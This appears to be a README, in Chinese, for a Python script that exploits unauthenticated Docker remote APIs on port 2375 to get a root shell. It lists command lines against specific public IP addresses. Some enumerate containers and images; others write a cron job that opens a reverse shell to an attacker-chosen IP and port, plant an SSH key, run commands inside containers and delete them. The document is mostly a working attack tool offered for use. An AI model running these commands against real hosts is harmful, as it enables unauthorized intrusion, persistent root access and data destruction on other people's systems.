/docker_api_vul

docker 未授权访问漏洞利用脚本

Primary LanguagePython

docker_api_vul

docker 未授权访问漏洞利用脚本

##安装docker-py库

pip install docker-py

##查看运行的容器

python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375

##查看所有的容器

python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -a

##查看所有镜像

python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -l

##查看端口映射

python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -L

##写计划任务(测试centos;ubuntu可能需要自己修改计划任务路径)

python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -i 镜像名 -H 反弹ip -P 反弹端口

##写sshkey(自行修改脚本的中公钥)

python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -i 镜像名 -k

##在容器中执行命令

python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -e "id" -I 容器id

##删除容器

python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -c -I 容器id

##修改client api版本

python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -v 1.22

##查看服务端api版本

python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -V